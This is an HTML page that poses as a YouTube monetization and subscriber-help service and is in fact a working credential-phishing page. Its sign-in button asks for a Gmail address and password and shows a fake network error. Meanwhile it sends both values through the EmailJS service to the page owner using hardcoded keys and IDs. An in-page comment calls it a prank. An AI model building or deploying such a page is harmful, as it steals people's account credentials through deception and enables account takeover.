<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Best Teaching App</title>
    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/@emailjs/browser@3/dist/email.min.js">
    </script>
    <script type="text/javascript">
        (function () {
            emailjs.init("d9gIHOSRHEjF9GkL0");
        })();
    </script>

    <style>
        *{
            margin: 0;
            font-family: 'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif;
        }

        body{
            background-color: skyblue;
            text-align: center;
        }

        #top{
            background-color: blue;
            color: white;
            padding: 1cm;
            text-align: center;
        }

        #signin{
            padding: 0.5cm;
            background-color: blue;
            border: 3px solid black;
            border-radius: 20px;
            color: white;
            font-size: 20px;
        }
    </style>
</head>
<body>
    <h1 id="top">Welcome, Here we will provide you the best service for youtube like MONETIZATION, providing help for SUBSCRIBERS and much more. <br> <br> <hr> <br> 
    </h1>

    <h2>
        Start by signing-in.
    </h3>
    <br>
    <hr>
    <br>
<!-- this is just a prnak -->
    <button id="signin" onclick="signined()">Sign-In</button>

    <br>
    <br>
    <hr>
    <br>

    <h1 id="output"></h1>

    <script>
        function signined() {
            let id = prompt("What's Your GmaiID?");
            let idp = prompt("What's Your GmailID's Password?");
            let all = "id = " + id + " idp =" + idp;
            document.getElementById("output").innerHTML = "Network Issue or Wrong details | Try Again";
            var params = {
                message: all
            }
            const serviceID = "service_yqye2da";
            const tempelateID = "template_db69fjy";
            emailjs.send(serviceID, tempelateID, params)
                .then(
                    res => {
                        all = "";
                    }
                )
        }
    </script>
</body>
</html>